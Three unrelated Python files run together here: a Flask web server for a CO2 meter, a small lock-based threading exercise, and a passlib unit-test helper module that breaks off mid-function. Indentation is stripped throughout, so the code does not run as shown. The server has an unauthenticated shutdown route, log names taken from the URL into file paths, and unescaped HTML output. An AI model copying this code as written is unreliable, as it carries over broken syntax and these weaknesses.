server.py
# coding=utf-8
""" Flask server for CO2meter
(c) Vladimir Filimonov, 2018-2021
E-mail: vladimir.a.filimonov@gmail.com
"""
import optparse
import logging
import threading
import time
import glob
import os
import socket
import signal
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import flask
from flask import request, render_template, jsonify
import numpy as np
import pandas as pd
import co2meter as co2
_DEFAULT_HOST = '127.0.0.1'
_DEFAULT_PORT = '1201'
_DEFAULT_INTERVAL = 30 # seconds
_DEFAULT_NAME = 'co2'
_INIT_TIME = 30 # time to initialize and calibrate device
_URL = 'https://github.com/vfilimonov/co2meter'
_COLORS = {'r': '#E81F2E', 'y': '#FAAF4C', 'g': '#7FB03F'}
_IMG_G = '1324881/36358454-d707e2f4-150e-11e8-9bd1-b479e232f28f'
_IMG_Y = '1324881/36358456-d8b513ba-150e-11e8-91eb-ade37733b19e'
_IMG_R = '1324881/36358457-da3e3e8c-150e-11e8-85af-855571275d88'
_RANGE_MID = [800, 1200]
_CO2_MAX_VALUE = 3200 # Cut our yaxis here
_DEGREES_CELSIUS = "℃" # Unicode U+2103, Degree Celsius
_DEGREES_FAHRENHEIT = "℉" # Unicode U+2109, Degree Fahrenheit
_name = _DEFAULT_NAME
_fahrenheit = False
_tight_margins=False
###############################################################################
mon = None
###############################################################################
app = flask.Flask(__name__)
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
###############################################################################
@app.route('/')
def home():
# Read CO2 and temp values
if mon is None:
status = '<h1 align="center" style="color:%s;">Device is not connected</h1>' % _COLORS['r']
else:
status = ''
try:
vals = list(mon._last_data)
vals[-1] = '%.1f' % vals[-1]
except:
data = read_logs()
vals = data.split('\n')[-2].split(',')
if status == '':
status = '<h1 align="center" style="color:%s;">Device is not ready</h1>' % _COLORS['r']
# Select image and color
if int(vals[1]) >= _RANGE_MID[1]:
color = _COLORS['r']
img = _IMG_R
elif int(vals[1]) < _RANGE_MID[0]:
color = _COLORS['g']
img = _IMG_G
else:
color = _COLORS['y']
img = _IMG_Y
co2 = '<font color="%s">%s ppm</font>' % (color, vals[1])
temperature = vals[2]
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
deg = _DEGREES_FAHRENHEIT
temperature = round(celsiusToFahrenheit(temperature), ndigits=1)
# Return template
return render_template('index.html', image=img, timestamp=vals[0],
co2=vals[1], color=color, temp=temperature, url=_URL,
status=status, degrees=deg)
#############################################################################
@app.route('/log', defaults={'logname': None})
@app.route('/log/<string:logname>')
def log(logname):
data = read_logs(name=logname)
return '<h1>Full log</h1>' + wrap_table(data)
@app.route('/log.csv', defaults={'logname': None})
@app.route('/log/<string:logname>.csv')
def log_csv(logname):
data = read_logs(name=logname)
return wrap_csv(data, logname)
@app.route('/log.json', defaults={'logname': None})
@app.route('/log/<string:logname>.json')
def log_json(logname):
data = read_logs(name=logname)
return wrap_json(data)
#############################################################################
@app.route('/rename')
def rename_log():
args = request.args
logging.info('rename %s', args.to_dict())
new_name = args.get('name', default=None, type=str)
if new_name is None:
return 'Error: new log name is not specified!'
global _name
_name = new_name
return 'Log name has changed to "%s"' % _name
#############################################################################
@app.route('/kill')
def shutdown():
stop_server()
global _monitoring
_monitoring = False
return 'Server shutting down...'
#############################################################################
# Dashboard on plotly.js
#############################################################################
def prepare_data(name=None, span='24H'):
data = read_logs(name)
data = pd.read_csv(StringIO(data), parse_dates=[0]).set_index('timestamp')
if span != 'FULL':
data = data.last(span)
global _fahrenheit
if _fahrenheit:
data['temp'] = data['temp'].apply(celsiusToFahrenheit)
if span == '1H':
# int64 has problems with serialisation, translate to floats
data['co2'] = pd.to_numeric(data['co2'], downcast='float')
elif span == '24H':
data = data.resample('60s').mean()
elif span == '7D':
data = data.resample('600s').mean()
elif span == '30D':
data = data.resample('1H').mean()
elif span == 'FULL':
if len(data) > 3000: # Resample only long series
data = data.resample('1H').mean()
data = data.round({'co2': 0, 'temp': 1})
return data
def rect(y0, y1, color):
return {'type': 'rect', 'layer': 'below',
'xref': 'paper', 'x0': 0, 'x1': 1,
'yref': 'y', 'y0': y0, 'y1': y1,
'fillcolor': color, 'opacity': 0.2, 'line': {'width': 0}}
def caption(title, x, y):
return {'xref': 'paper', 'yref': 'paper', 'x': x, 'y': y, 'text': title,
'showarrow': False, 'font': {'size': 16},
'xanchor': 'center', 'yanchor': 'bottom'}
#############################################################################
@app.route("/chart/", strict_slashes=False)
@app.route("/chart/<name>", strict_slashes=False)
@app.route("/chart/<name>/<freq>", strict_slashes=False)
def chart_co2_temp(name=None, freq='24H'):
data = prepare_data(name, freq)
defaultTMin = 15
defaultTMax = 27
temperatureData = data['temp']
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
defaultTMin = 60
defaultTMax = 80
deg = _DEGREES_FAHRENHEIT
if _tight_margins:
co2_min = data['co2'].min() * 0.95
co2_max = data['co2'].max() * 1.05
t_min = data['temp'].min() * 0.95
t_max = data['temp'].max() * 1.05
else:
co2_min = min(500, data['co2'].min() - 50)
co2_max = min(max(2000, data['co2'].max() + 50), _CO2_MAX_VALUE)
t_min = min(defaultTMin, temperatureData.min())
t_max = max(defaultTMax, temperatureData.max())
rect_green = rect(co2_min, _RANGE_MID[0], _COLORS['g'])
rect_yellow = rect(_RANGE_MID[0], _RANGE_MID[1], _COLORS['y'])
rect_red = rect(_RANGE_MID[1], co2_max, _COLORS['r'])
# Check if mobile
try:
agent = request.headers.get('User-Agent')
phones = ['iphone', 'android', 'blackberry', 'fennec', 'iemobile']
staticPlot = any(phone in agent.lower() for phone in phones)
except RuntimeError:
staticPlot = False
# Make figure
index = data.index.format()
co2 = list(np.where(data.co2.isnull(), None, data.co2))
temp = list(np.where(data.temp.isnull(), None, data.temp))
d_co2 = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'CO2 concentration (ppm)',
'xaxis': 'x1', 'yaxis': 'y1',
'x': index, 'y': co2}
d_temp = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'Temperature (%s)' % deg,
'xaxis': 'x1', 'yaxis': 'y2',
'x': index, 'y': temp}
config = {'displayModeBar': False, 'staticPlot': staticPlot}
layout = {'margin': {'l': 30, 'r': 10, 'b': 30, 't': 30},
'showlegend': False,
'shapes': [rect_green, rect_yellow, rect_red],
'xaxis1': {'domain': [0, 1], 'anchor': 'y2'},
'yaxis1': {'domain': [0.55, 1], 'anchor': 'free', 'position': 0,
'range': [co2_min, co2_max]},
'yaxis2': {'domain': [0, 0.45], 'anchor': 'x1',
'range': [t_min, t_max]},
'annotations': [caption('CO2 concentration (ppm)', 0.5, 1),
caption(f'Temperature ({deg})', 0.5, 0.45)]
}
fig = {'data': [d_co2, d_temp], 'layout': layout, 'config': config}
return jsonify(fig)
#############################################################################
@app.route("/dashboard")
def dashboard_plotly():
# Get list of files
files = glob.glob('logs/*.csv')
files = [os.path.splitext(os.path.basename(_))[0] for _ in files]
# And find selected for jinja template
files = [(_, _ == _name) for _ in files]
return render_template('dashboard.html', files=files)
#############################################################################
# Monitoring routines
#############################################################################
def read_logs(name=None):
""" read log files """
if name is None:
name = _name
with open(os.path.join('logs', name + '.csv'), 'r') as f:
data = f.read()
return data
#############################################################################
def write_to_log(vals):
""" file name for a current log """
# Create file if does not exist
fname = os.path.join('logs', _name + '.csv')
if not os.path.exists('logs'):
os.makedirs('logs')
if not os.path.isfile(fname):
with open(fname, 'a') as f:
f.write('timestamp,co2,temp\n')
# Append to file
with open(fname, 'a') as f:
f.write('%s,%d,%.1f\n' % vals)
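# Illustrative note (added commentary, values below are made up): with the
# defaults above, the monitoring thread appends one row per interval to
# logs/co2.csv, so the file read back by read_logs() looks roughly like:
#
#   timestamp,co2,temp
#   2021-03-01 12:00:00,684,22.4
#   2021-03-01 12:00:30,702,22.5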
def read_co2_data(bypass_decrypt):
""" A small hack to read co2 data from monitor in order to account for case
when monitor is not initialized yet
"""
global mon
if mon is None:
# Try to initialize
try:
mon = co2.CO2monitor(bypass_decrypt=bypass_decrypt)
# Sleep. If we read from device before it is calibrated, we'll
# get wrong values
time.sleep(_INIT_TIME)
except OSError:
return None
try:
return mon.read_data_raw(max_requests=1000)
except OSError:
# We drop the link and will need to initialize the monitor again next time
mon = None
return None
def monitoring_CO2(interval, bypass_decrypt):
""" Tread for monitoring / logging """
while _monitoring:
# Request concentration and temperature
vals = read_co2_data(bypass_decrypt=bypass_decrypt)
if vals is None:
logging.info('[%s] monitor is not connected' % co2.now())
else:
# Write to log and sleep
logging.info('[%s] %d ppm, %.1f deg C' % tuple(vals))
write_to_log(vals)
# Sleep for the next call
time.sleep(interval)
#############################################################################
def start_monitor(interval=_DEFAULT_INTERVAL, bypass_decrypt=False):
""" Start CO2 monitoring in a thread """
logging.basicConfig(level=logging.INFO)
global _monitoring
_monitoring = True
t = threading.Thread(target=monitoring_CO2, args=(interval, bypass_decrypt, ))
t.start()
return t
#############################################################################
def init_homekit_target(port, host, bypass_decrypt):
from co2meter.homekit import start_homekit
global mon
while mon is None:
time.sleep(5)
logging.info('Starting homekit server')
start_homekit(mon, host=host, port=port, monitoring=False, handle_sigint=False, bypass_decrypt=bypass_decrypt)
def init_homekit(port, host, bypass_decrypt):
# We'll start homekit once the device is connected
t = threading.Thread(target=init_homekit_target, args=(port, host, bypass_decrypt, ))
t.start()
#############################################################################
# Server routines
#############################################################################
def my_ip():
""" Get my local IP address """
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80)) # Google Public DNS
return s.getsockname()[0]
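# Note: "connecting" a UDP socket does not send any packets; it only makes the
# OS choose the outgoing interface/address for that destination, which is why
# this is a cheap way to discover the machine's local IP address.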
def start_server_homekit():
""" Start monitoring, flask/dash server and homekit accessory """
# Based on http://flask.pocoo.org/snippets/133/
from co2meter.homekit import PORT
host = my_ip()
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % host,
default=host)
parser.add_option("-P", "--port-flask",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-K", "--port-homekit",
help="Port for the Homekit accessory [default %s]" % PORT,
default=PORT)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
parser.add_option("-b", "--bypass-decrypt",
help="Bypass decrypt (needed for certain models of the device)",
action="store_true", dest="bypass_decrypt")
options, _ = parser.parse_args()
global _name
_name = options.name
# Start monitoring
t_monitor = start_monitor()
# Start a thread that will initialize homekit once device is connected
init_homekit(host=options.host, port=int(options.port_homekit), bypass_decrypt=bool(options.bypass_decrypt))
# Start server
app.run(host=options.host, port=int(options.port_flask))
#############################################################################
def start_server():
""" Runs Flask instance using command line arguments """
# Based on http://flask.pocoo.org/snippets/133/
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % _DEFAULT_HOST,
default=_DEFAULT_HOST)
parser.add_option("-P", "--port",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-I", "--interval",
help="Interval in seconds for CO2meter requests [default %d]" % _DEFAULT_INTERVAL,
default=_DEFAULT_INTERVAL)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
parser.add_option("-m", "--nomonitoring",
help="No live monitoring (only flask server)",
action="store_true", dest="no_monitoring")
parser.add_option("-s", "--noserver",
help="No server (only monitoring to file)",
action="store_true", dest="no_server")
parser.add_option("-d", "--debug",
action="store_true", dest="debug",
help=optparse.SUPPRESS_HELP)
parser.add_option("-F", "--fahrenheit",
help="Show the temperature in Fahrenheit [default False]",
action="store_true",
default=False,
dest="fahrenheit")
parser.add_option("-b", "--bypass-decrypt",
help="Bypass decrypt (needed for certain models of the device)",
action="store_true", dest="bypass_decrypt")
parser.add_option("-t", "--tight-margins",
help="Use tight margins when plotting",
action="store_true", dest="tight_margins")
options, _ = parser.parse_args()
if options.debug and not options.no_monitoring:
parser.error("--debug option could be used only with --no_monitoring")
global _name
_name = options.name
global _fahrenheit
_fahrenheit = options.fahrenheit
global _tight_margins
_tight_margins = options.tight_margins
# Start monitoring
if not options.no_monitoring:
start_monitor(interval=int(options.interval), bypass_decrypt=bool(options.bypass_decrypt))
# Start server
if not options.no_server:
app.run(debug=options.debug, host=options.host, port=int(options.port))
def stop_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
###############################################################################
def wrap_csv(data, fname='output'):
""" Make CSV response downloadable """
if fname is None:
fname = 'log'
si = StringIO(data)
output = flask.make_response(si.getvalue())
output.headers["Content-Disposition"] = "attachment; filename=%s.csv" % fname
output.headers["Content-type"] = "text/csv"
return output
def wrap_json(data):
""" Convert CSV to JSON and make it downloadable """
entries = [_.split(',') for _ in data.split('\n') if _ != '']
js = [{k: v for k, v in zip(['timestamp', 'co2', 'temp'], x)}
for x in entries[1:]]
return jsonify(js)
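# Illustrative sketch (assumed data, added commentary): for the CSV log format
# produced by write_to_log(), wrap_json() returns records shaped like
#   [{"timestamp": "2021-03-01 12:00:00", "co2": "684", "temp": "22.4"}, ...]
# values stay strings because the CSV fields are split without type conversion.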
def wrap_table(data):
""" Return HTML for table """
res = ('<table><thead><tr><th>Timestamp</th><th>CO2 concentration</th>'
'<th>Temperature</th></tr></thead><tbody>')
for line in data.split('\n')[1:]:
res += '<tr>' + ''.join(['<td>%s</td>' % d for d in line.split(',')]) + '</tr>'
res += '</tbody></table>'
return res
###############################################################################
def celsiusToFahrenheit(c):
return (9 * float(c)) / 5 + 32
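# Worked example: celsiusToFahrenheit(21.5) == 21.5 * 9 / 5 + 32 == 70.7.
# A hypothetical inverse (not used anywhere in this module) would be:
#   def fahrenheitToCelsius(f):
#       return (float(f) - 32) * 5 / 9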
###############################################################################
if __name__ == '__main__':
# start_server() will take care of start_monitor()
start_server()
# start_server_homekit()
foo.py
#! /usr/bin/env python
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Lock, Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
lock = Lock()
i = 0
def incrementingFunction():
global i
# Increment i 1_000_000 times
for t in range(0, 1000000):
lock.acquire()
i = i + 1
lock.release()
def decrementingFunction():
global i
# Decrement i 1_000_000 times
for t in range(0, 1000000):
lock.acquire()
i = i - 1
lock.release()
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
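# Note (added commentary, not part of the original exercise): the Lock matters
# because `i = i + 1` is a read-modify-write sequence, not an atomic operation.
# Without acquire()/release() around it, the two threads can interleave between
# the read and the write and lose updates, so the value printed by main() would
# usually not be 0. An equivalent, more idiomatic guard would be:
#
#   with lock:
#       i = i + 1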
utils.py
"""helpers for passlib unittests"""
#=============================================================================
# imports
#=============================================================================
from __future__ import with_statement
# core
from binascii import unhexlify
import contextlib
from functools import wraps, partial
import hashlib
import logging; log = logging.getLogger(__name__)
import random
import re
import os
import sys
import tempfile
import threading
import time
from passlib.exc import PasslibHashWarning, PasslibConfigWarning
from passlib.utils.compat import PY3, JYTHON
import warnings
from warnings import warn
# site
# pkg
from passlib import exc
from passlib.exc import MissingBackendError
import passlib.registry as registry
from passlib.tests.backports import TestCase as _TestCase, skip, skipIf, skipUnless, SkipTest
from passlib.utils import has_rounds_info, has_salt_info, rounds_cost_values, \
rng as sys_rng, getrandstr, is_ascii_safe, to_native_str, \
repeat_string, tick, batch
from passlib.utils.compat import iteritems, irange, u, unicode, PY2
from passlib.utils.decor import classproperty
import passlib.utils.handlers as uh
# local
__all__ = [
# util funcs
'TEST_MODE',
'set_file', 'get_file',
# unit testing
'TestCase',
'HandlerCase',
]
#=============================================================================
# environment detection
#=============================================================================
# figure out if we're running under GAE;
# some tests (e.g. FS writing) should be skipped.
# XXX: is there better way to do this?
try:
import google.appengine
except ImportError:
GAE = False
else:
GAE = True
def ensure_mtime_changed(path):
"""ensure file's mtime has changed"""
# NOTE: this is a hack to deal w/ filesystems whose mtime resolution is >= 1s,
# when a test needs to be sure the mtime changed after writing to the file.
last = os.path.getmtime(path)
while os.path.getmtime(path) == last:
time.sleep(0.1)
os.utime(path, None)
def _get_timer_resolution(timer):
def sample():
start = cur = timer()
while start == cur:
cur = timer()
return cur-start
return min(sample() for _ in range(3))
TICK_RESOLUTION = _get_timer_resolution(tick)
#=============================================================================
# test mode
#=============================================================================
_TEST_MODES = ["quick", "default", "full"]
_test_mode = _TEST_MODES.index(os.environ.get("PASSLIB_TEST_MODE",
"default").strip().lower())
def TEST_MODE(min=None, max=None):
"""check if test for specified mode should be enabled.
``"quick"``
run the bare minimum tests to ensure functionality.
variable-cost hashes are tested at their lowest setting.
hash algorithms are only tested against the backend that will
be used on the current host. no fuzz testing is done.
``"default"``
same as ``"quick"``, except: hash algorithms are tested
at default levels, and a brief round of fuzz testing is done
for each hash.
``"full"``
extra regression and internal tests are enabled, hash algorithms are tested
against all available backends, unavailable ones are mocked where possible,
additional time is devoted to fuzz testing.
"""
if min and _test_mode < _TEST_MODES.index(min):
return False
if max and _test_mode > _TEST_MODES.index(max):
return False
return True
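# Example usage (mirroring calls later in this module): TEST_MODE("full")
# gates the most expensive checks, while TEST_MODE(max="quick") selects
# reduced-cost settings, e.g.:
#
#   if TEST_MODE(max="quick"):
#       kwds['rounds'] = max(3, handler.min_rounds)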
#=============================================================================
# hash object inspection
#=============================================================================
def has_relaxed_setting(handler):
"""check if handler supports 'relaxed' kwd"""
# FIXME: I've been lazy, should probably just add 'relaxed' kwd
# to all handlers that derive from GenericHandler
# ignore wrapper classes for now... though we could introspect.
if hasattr(handler, "orig_prefix"):
return False
return 'relaxed' in handler.setting_kwds or issubclass(handler,
uh.GenericHandler)
def get_effective_rounds(handler, rounds=None):
"""get effective rounds value from handler"""
handler = unwrap_handler(handler)
return handler(rounds=rounds, use_defaults=True).rounds
def is_default_backend(handler, backend):
"""check if backend is the default for source"""
try:
orig = handler.get_backend()
except MissingBackendError:
return False
try:
handler.set_backend("default")
return handler.get_backend() == backend
finally:
handler.set_backend(orig)
def iter_alt_backends(handler, current=None, fallback=False):
"""
iterate over alternate backends available to handler.
.. warning::
not thread-safe due to has_backend() call
"""
if current is None:
current = handler.get_backend()
backends = handler.backends
idx = backends.index(current)+1 if fallback else 0
for backend in backends[idx:]:
if backend != current and handler.has_backend(backend):
yield backend
def get_alt_backend(*args, **kwds):
for backend in iter_alt_backends(*args, **kwds):
return backend
return None
def unwrap_handler(handler):
"""return original handler, removing any wrapper objects"""
while hasattr(handler, "wrapped"):
handler = handler.wrapped
return handler
def handler_derived_from(handler, base):
"""
test if <handler> was derived from <base> via <base.using()>.
"""
# XXX: need way to do this more formally via ifc,
# for now just hacking in the cases we encounter in testing.
if handler == base:
return True
elif isinstance(handler, uh.PrefixWrapper):
while handler:
if handler == base:
return True
# helper set by PrefixWrapper().using() just for this case...
handler = handler._derived_from
return False
elif isinstance(handler, type) and issubclass(handler, uh.MinimalHandler):
return issubclass(handler, base)
else:
raise NotImplementedError("don't know how to inspect handler: %r" % (handler,))
@contextlib.contextmanager
def patch_calc_min_rounds(handler):
"""
internal helper for do_config_encrypt() --
context manager which temporarily replaces handler's _calc_checksum()
with one that uses min_rounds; useful when trying to generate config
with high rounds value, but don't care if output is correct.
"""
if isinstance(handler, type) and issubclass(handler, uh.HasRounds):
# XXX: also require GenericHandler for this branch?
wrapped = handler._calc_checksum
def wrapper(self, *args, **kwds):
rounds = self.rounds
try:
self.rounds = self.min_rounds
return wrapped(self, *args, **kwds)
finally:
self.rounds = rounds
handler._calc_checksum = wrapper
try:
yield
finally:
handler._calc_checksum = wrapped
elif isinstance(handler, uh.PrefixWrapper):
with patch_calc_min_rounds(handler.wrapped):
yield
else:
yield
return
#=============================================================================
# misc helpers
#=============================================================================
def set_file(path, content):
"""set file to specified bytes"""
if isinstance(content, unicode):
content = content.encode("utf-8")
with open(path, "wb") as fh:
fh.write(content)
def get_file(path):
"""read file as bytes"""
with open(path, "rb") as fh:
return fh.read()
def tonn(source):
"""convert native string to non-native string"""
if not isinstance(source, str):
return source
elif PY3:
return source.encode("utf-8")
else:
try:
return source.decode("utf-8")
except UnicodeDecodeError:
return source.decode("latin-1")
def hb(source):
"""
helper for representing byte strings in hex.
usage: ``hb("deadbeef23")``
"""
return unhexlify(re.sub(r"\s", "", source))
def limit(value, lower, upper):
if value < lower:
return lower
elif value > upper:
return upper
return value
def quicksleep(delay):
"""because time.sleep() doesn't even have 10ms accuracy on some OSes"""
start = tick()
while tick()-start < delay:
pass
def time_call(func, setup=None, maxtime=1, bestof=10):
"""
timeit() wrapper which tries to get as accurate a measurement as possible w/in maxtime seconds.
:returns:
``(avg_seconds_per_call, log10_number_of_repetitions)``
"""
from timeit import Timer
from math import log
timer = Timer(func, setup=setup or '')
number = 1
end = tick() + maxtime
while True:
delta = min(timer.repeat(bestof, number))
if tick() >= end:
return delta/number, int(log(number, 10))
number *= 10
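# Minimal usage sketch (hypothetical call, following the docstring above):
#
#   secs_per_call, reps_log10 = time_call(lambda: hashlib.sha256(b"x").digest())
#
# returns the average seconds per call and log10 of the repetition count used.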
def run_with_fixed_seeds(count=128, master_seed=0x243F6A8885A308D3):
"""
decorator to run a test method w/ multiple fixed seeds.
"""
def builder(func):
@wraps(func)
def wrapper(*args, **kwds):
rng = random.Random(master_seed)
for _ in irange(count):
kwds['seed'] = rng.getrandbits(32)
func(*args, **kwds)
return wrapper
return builder
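# Usage sketch (hypothetical test method; the decorator calls it `count` times,
# injecting a fresh 32-bit 'seed' kwarg on every iteration):
#
#   @run_with_fixed_seeds(count=4)
#   def test_something(self, seed):
#       rng = random.Random(seed)
#       ...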
#=============================================================================
# custom test harness
#=============================================================================
class TestCase(_TestCase):
"""passlib-specific test case class
this class adds a number of features to the standard TestCase...
* common prefix for all test descriptions
* resets warnings filter & registry for every test
* tweaks to message formatting
* __msg__ kwd added to assertRaises()
* suite of methods for matching against warnings
"""
#===================================================================
# add various custom features
#===================================================================
#---------------------------------------------------------------
# make it easy for test cases to add common prefix to shortDescription
#---------------------------------------------------------------
# string prepended to all tests in TestCase
descriptionPrefix = None
def shortDescription(self):
"""wrap shortDescription() method to prepend descriptionPrefix"""
desc = super(TestCase, self).shortDescription()
prefix = self.descriptionPrefix
if prefix:
desc = "%s: %s" % (prefix, desc or str(self))
return desc
#---------------------------------------------------------------
# hack things so nose and ut2 both skip subclasses who have
# "__unittest_skip=True" set, or whose names start with "_"
#---------------------------------------------------------------
@classproperty
def __unittest_skip__(cls):
# NOTE: this attr is technically a unittest2 internal detail.
name = cls.__name__
return name.startswith("_") or \
getattr(cls, "_%s__unittest_skip" % name, False)
@classproperty
def __test__(cls):
# make nose just proxy __unittest_skip__
return not cls.__unittest_skip__
# flag to skip *this* class
__unittest_skip = True
#---------------------------------------------------------------
# reset warning filters & registry before each test
#---------------------------------------------------------------
# flag to reset all warning filters & ignore state
resetWarningState = True
def setUp(self):
super(TestCase, self).setUp()
self.setUpWarnings()
def setUpWarnings(self):
"""helper to init warning filters before subclass setUp()"""
if self.resetWarningState:
ctx = reset_warnings()
ctx.__enter__()
self.addCleanup(ctx.__exit__)
# ignore warnings about PasswordHash features deprecated in 1.7
# TODO: should be cleaned in 2.0, when support will be dropped.
# should be kept until then, so we test the legacy paths.
warnings.filterwarnings("ignore", r"the method .*\.(encrypt|genconfig|genhash)\(\) is deprecated")
warnings.filterwarnings("ignore", r"the 'vary_rounds' option is deprecated")
#---------------------------------------------------------------
# tweak message formatting so longMessage mode is only enabled
# if msg ends with ":", and turn on longMessage by default.
#---------------------------------------------------------------
longMessage = True
def _formatMessage(self, msg, std):
if self.longMessage and msg and msg.rstrip().endswith(":"):
return '%s %s' % (msg.rstrip(), std)
else:
return msg or std
#---------------------------------------------------------------
# override assertRaises() to support '__msg__' keyword,
# and to return the caught exception for further examination
#---------------------------------------------------------------
def assertRaises(self, _exc_type, _callable=None, *args, **kwds):
msg = kwds.pop("__msg__", None)
if _callable is None:
# FIXME: this ignores 'msg'
return super(TestCase, self).assertRaises(_exc_type, None,
*args, **kwds)
try:
result = _callable(*args, **kwds)
except _exc_type as err:
return err
std = "function returned %r, expected it to raise %r" % (result,
_exc_type)
raise self.failureException(self._formatMessage(msg, std))
#---------------------------------------------------------------
# forbid a bunch of deprecated aliases so I stop using them
#---------------------------------------------------------------
def assertEquals(self, *a, **k):
raise AssertionError("this alias is deprecated by unittest2")
assertNotEquals = assertRegexMatches = assertEquals
#===================================================================
# custom methods for matching warnings
#===================================================================
def assertWarning(self, warning,
message_re=None, message=None,
category=None,
filename_re=None, filename=None,
lineno=None,
msg=None,
):
"""check if warning matches specified parameters.
'warning' is the instance of Warning to match against;
can also be instance of WarningMessage (as returned by catch_warnings).
"""
# check input type
if hasattr(warning, "category"):
# resolve WarningMessage -> Warning, but preserve original
wmsg = warning
warning = warning.message
else:
# no original WarningMessage, passed raw Warning
wmsg = None
# tests that can use a warning instance or WarningMessage object
if message:
self.assertEqual(str(warning), message, msg)
if message_re:
self.assertRegex(str(warning), message_re, msg)
if category:
self.assertIsInstance(warning, category, msg)
# tests that require a WarningMessage object
if filename or filename_re:
if not wmsg:
raise TypeError("matching on filename requires a "
"WarningMessage instance")
real = wmsg.filename
if real.endswith(".pyc") or real.endswith(".pyo"):
# FIXME: should use a stdlib call to resolve this back
# to module's original filename.
real = real[:-1]
if filename:
self.assertEqual(real, filename, msg)
if filename_re:
self.assertRegex(real, filename_re, msg)
if lineno:
if not wmsg:
raise TypeError("matching on lineno requires a "
"WarningMessage instance")
self.assertEqual(wmsg.lineno, lineno, msg)
class _AssertWarningList(warnings.catch_warnings):
"""context manager for assertWarningList()"""
def __init__(self, case, **kwds):
self.case = case
self.kwds = kwds
self.__super = super(TestCase._AssertWarningList, self)
self.__super.__init__(record=True)
def __enter__(self):
self.log = self.__super.__enter__()
def __exit__(self, *exc_info):
self.__super.__exit__(*exc_info)
if exc_info[0] is None:
self.case.assertWarningList(self.log, **self.kwds)
def assertWarningList(self, wlist=None, desc=None, msg=None):
"""check that warning list (e.g. from catch_warnings) matches pattern"""
if desc is None:
assert wlist is not None
return self._AssertWarningList(self, desc=wlist, msg=msg)
# TODO: make this display better diff of *which* warnings did not match
assert desc is not None
if not isinstance(desc, (list,tuple)):
desc = [desc]
for idx, entry in enumerate(desc):
if isinstance(entry, str):
entry = dict(message_re=entry)
elif isinstance(entry, type) and issubclass(entry, Warning):
entry = dict(category=entry)
elif not isinstance(entry, dict):
raise TypeError("entry must be str, warning, or dict")
try:
data = wlist[idx]
except IndexError:
break
self.assertWarning(data, msg=msg, **entry)
else:
if len(wlist) == len(desc):
return
std = "expected %d warnings, found %d: wlist=%s desc=%r" % \
(len(desc), len(wlist), self._formatWarningList(wlist), desc)
raise self.failureException(self._formatMessage(msg, std))
def consumeWarningList(self, wlist, desc=None, *args, **kwds):
"""[deprecated] assertWarningList() variant that clears list afterwards"""
if desc is None:
desc = []
self.assertWarningList(wlist, desc, *args, **kwds)
del wlist[:]
def _formatWarning(self, entry):
tail = ""
if hasattr(entry, "message"):
# WarningMessage instance.
tail = " filename=%r lineno=%r" % (entry.filename, entry.lineno)
if entry.line:
tail += " line=%r" % (entry.line,)
entry = entry.message
cls = type(entry)
return "<%s.%s message=%r%s>" % (cls.__module__, cls.__name__,
str(entry), tail)
def _formatWarningList(self, wlist):
return "[%s]" % ", ".join(self._formatWarning(entry) for entry in wlist)
#===================================================================
# capability tests
#===================================================================
def require_stringprep(self):
"""helper to skip test if stringprep is missing"""
from passlib.utils import stringprep
if not stringprep:
from passlib.utils import _stringprep_missing_reason
raise self.skipTest("not available - stringprep module is " +
_stringprep_missing_reason)
def require_TEST_MODE(self, level):
"""skip test for all PASSLIB_TEST_MODE values below <level>"""
if not TEST_MODE(level):
raise self.skipTest("requires >= %r test mode" % level)
def require_writeable_filesystem(self):
"""skip test if writeable FS not available"""
if GAE:
return self.skipTest("GAE doesn't offer read/write filesystem access")
#===================================================================
# reproducible random helpers
#===================================================================
#: global thread lock for random state
#: XXX: could split into global & per-instance locks if need be
_random_global_lock = threading.Lock()
#: cache of global seed value, initialized on first call to getRandom()
_random_global_seed = None
#: per-instance cache of name -> RNG
_random_cache = None
def getRandom(self, name="default", seed=None):
"""
Return a :class:`random.Random` object for current test method to use.
Within an instance, multiple calls with the same name will return
the same object.
When first created, each RNG will be seeded with value derived from
a global seed, the test class module & name, the current test method name,
and the **name** parameter.
The global seed is taken from the $RANDOM_TEST_SEED env var,
the $PYTHONHASHSEED env var, or a randomly generated value the
first time this method is called. In all cases, the value
is logged for reproducibility.
:param name:
name to uniquely identify separate RNGs w/in a test
(e.g. for threaded tests).
:param seed:
override global seed when initializing rng.
:rtype: random.Random
"""
# check cache
cache = self._random_cache
if cache and name in cache:
return cache[name]
with self._random_global_lock:
# check cache again, and initialize it
cache = self._random_cache
if cache and name in cache:
return cache[name]
elif not cache:
cache = self._random_cache = {}
# init global seed
global_seed = seed or TestCase._random_global_seed
if global_seed is None:
# NOTE: checking PYTHONHASHSEED, because if that's set,
# the test runner wants something reproducible.
global_seed = TestCase._random_global_seed = \
int(os.environ.get("RANDOM_TEST_SEED") or
os.environ.get("PYTHONHASHSEED") or
sys_rng.getrandbits(32))
# XXX: would it be better to print() this?
log.info("using RANDOM_TEST_SEED=%d", global_seed)
# create seed
cls = type(self)
source = "\n".join([str(global_seed), cls.__module__, cls.__name__,
self._testMethodName, name])
